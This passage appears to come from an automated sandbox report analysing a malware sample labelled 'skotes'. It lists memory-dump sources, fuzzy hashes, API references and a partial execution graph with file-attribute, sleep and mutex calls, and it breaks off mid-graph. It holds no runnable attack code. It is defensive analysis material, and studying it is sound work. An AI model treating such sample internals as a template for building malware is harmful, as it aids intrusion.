                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strrchr
                                                          • String ID:
                                                          • API String ID: 3213747228-0
                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                          • Instruction ID: ae653f2904145b69ab52663abb2b4fb7e3edd65935fe92c1210b3776c40d0dfd
                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                          • Instruction Fuzzy Hash: 67B145329402959FDB11DF28C8D17EEBBE5EF46340F1441AAF855EB241D6349E82EBA0
                                                          APIs
                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00BE2846
                                                          • ___std_exception_destroy.LIBVCRUNTIME ref: 00BE28E0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___std_exception_copy___std_exception_destroy
                                                          • String ID: s|-I
                                                          • API String ID: 2970364248-705684097
                                                          • Opcode ID: c1ca72628c654d97724bfa1a59d4662d72901f5ceea004e0ea4ff440271a22c5
                                                          • Instruction ID: 81b5f87bd3b450121210c367a269677bdb0e3bac2254b391bdc224702ad89866
                                                          • Opcode Fuzzy Hash: c1ca72628c654d97724bfa1a59d4662d72901f5ceea004e0ea4ff440271a22c5
                                                          • Instruction Fuzzy Hash: 1C716071E002489BDB04DFA8C881BEDFBF9EF59310F14415DE815A7285D774A984CBA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: list too long$s|-I
                                                          • API String ID: 0-3615790553
                                                          • Opcode ID: 5f07bc49bf40d0284e5dde9f2ce67705fd588e9e9e0b8d4e77eb35386144736f
                                                          • Instruction ID: 62b99f1016708818550699d35763e286a69df932321fe719d57c1594582f3fe1
                                                          • Opcode Fuzzy Hash: 5f07bc49bf40d0284e5dde9f2ce67705fd588e9e9e0b8d4e77eb35386144736f
                                                          • Instruction Fuzzy Hash: E76180B0D04658ABDB20DF64CD85BA9B7F4FF04700F1041E9E91DAB291EB71AA89CB51
                                                          APIs
                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00BE29DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___std_exception_copy
                                                          • String ID: s|-I$s|-I
                                                          • API String ID: 2659868963-1844435136
                                                          • Opcode ID: 38769f8544229b35ce747ec0febdf81743671c15ad00ebd1d7c2479322e2648e
                                                          • Instruction ID: df72a3c090946696b66b2c23f6af11821a13194c72420b1f4b381970a94d5a12
                                                          • Opcode Fuzzy Hash: 38769f8544229b35ce747ec0febdf81743671c15ad00ebd1d7c2479322e2648e
                                                          • Instruction Fuzzy Hash: D231C3B1910209AFCB14DF58C841B9EFBF9FF49720F54462AF814A7780E771A954CBA0
                                                          APIs
                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 00BE2B63
                                                          Strings
                                                          • This function cannot be called on a default constructed task, xrefs: 00BE2B43
                                                          • s|-I, xrefs: 00BE2B36
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1494086118.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true
                                                          • Associated: 00000002.00000002.1494070267.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494086118.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494147272.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494163378.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494180512.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494301730.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494321263.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494348892.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494367753.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494385723.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494435311.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494454135.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494478539.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494499056.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494518059.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494538130.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494561378.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494577507.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494602349.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494622052.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494647286.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494667013.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494685161.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494704705.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494730253.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494748853.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494769213.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494789187.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494807530.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494827024.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494847455.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494871438.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494895039.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494918014.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494975892.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1494994428.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495011286.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495031618.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495048097.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495068706.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495089390.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495113050.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                          • Associated: 00000002.00000002.1495131132.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_be0000_skotes.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___std_exception_copy
                                                          • String ID: This function cannot be called on a default constructed task$s|-I
                                                          • API String ID: 2659868963-1262271033
                                                          • Opcode ID: 30ca8385087494d60fe0d49e6bda9ef0c40c4e9b7a7dfe608a5a8bd637a52956
                                                          • Instruction ID: 6dae521a1b3b58d9aa92af0ffb5518d8fef25a497fed42689e6ee20c78ad14e7
                                                          • Opcode Fuzzy Hash: 30ca8385087494d60fe0d49e6bda9ef0c40c4e9b7a7dfe608a5a8bd637a52956
                                                          • Instruction Fuzzy Hash: 4AF0A771D2030C9BC710DF68984159EFBF9EF16300F5442AEF84167340EB711A58CB95

                                                          Execution Graph

                                                          Execution Coverage:4.3%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:23.7%
                                                          Total number of Nodes:118
                                                          Total number of Limit Nodes:7
                                                          execution_graph 37481 c1c1c4 37482 c1c1ee 37481->37482 37484 c1c259 __dosmaperr ___std_exception_copy __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37481->37484 37482->37484 37485 c2292b 37482->37485 37486 c22937 __FrameHandler3::FrameUnwindToState Concurrency::details::ThreadScheduler::CreateInternalContext 37485->37486 37488 c2295c 37486->37488 37489 c2284d 37486->37489 37488->37484 37490 c22899 __freea __wsopen_s 37489->37490 37491 c22910 37490->37491 37494 c22907 37490->37494 37492 c2290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37491->37492 37508 c226f2 37491->37508 37492->37488 37496 c22517 37494->37496 37506 c22526 __freea ___std_exception_copy __wsopen_s 37496->37506 37497 c22744 __freea 37498 c2274f GetTimeZoneInformation 37497->37498 37505 c2276b __cftof 37498->37505 37499 c22910 37500 c226f2 GetTimeZoneInformation 37499->37500 37504 c2290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37499->37504 37500->37504 37501 c22907 37502 c22517 GetTimeZoneInformation 37501->37502 37502->37504 37503 c22842 __freea ___std_exception_copy __wsopen_s 37503->37499 37503->37501 37504->37492 37505->37492 37506->37497 37506->37503 37507 c226c8 37506->37507 37507->37492 37509 c22701 37508->37509 37510 c22744 __freea 37509->37510 37516 c22842 __freea ___std_exception_copy __wsopen_s 37509->37516 37511 c2274f GetTimeZoneInformation 37510->37511 37518 c2276b __cftof 37511->37518 37512 c22910 37513 c226f2 GetTimeZoneInformation 37512->37513 37517 c2290d __freea __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37512->37517 37513->37517 37514 c22907 37515 c22517 GetTimeZoneInformation 37514->37515 37515->37517 37516->37512 37516->37514 37517->37492 37518->37492 37549 be9ba5 GetFileAttributesA 37550 be9bb5 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 37549->37550 37551 be9c80 Concurrency::details::ResourceManager::Release Concurrency::details::_CancellationTokenState::_RegisterCallback 37550->37551 37552 bea960 Sleep CreateMutexA 37550->37552 37553 bea98e 37552->37553 37554 c16dda 37555 c16df6 __wsopen_s 37554->37555 37556 c16de8 37554->37556 37560 c16e24 __freea 37555->37560 37561 c16e4c 37555->37561 37557 c16e4c 4 API calls 37556->37557 37558 c16df2 37557->37558 37562 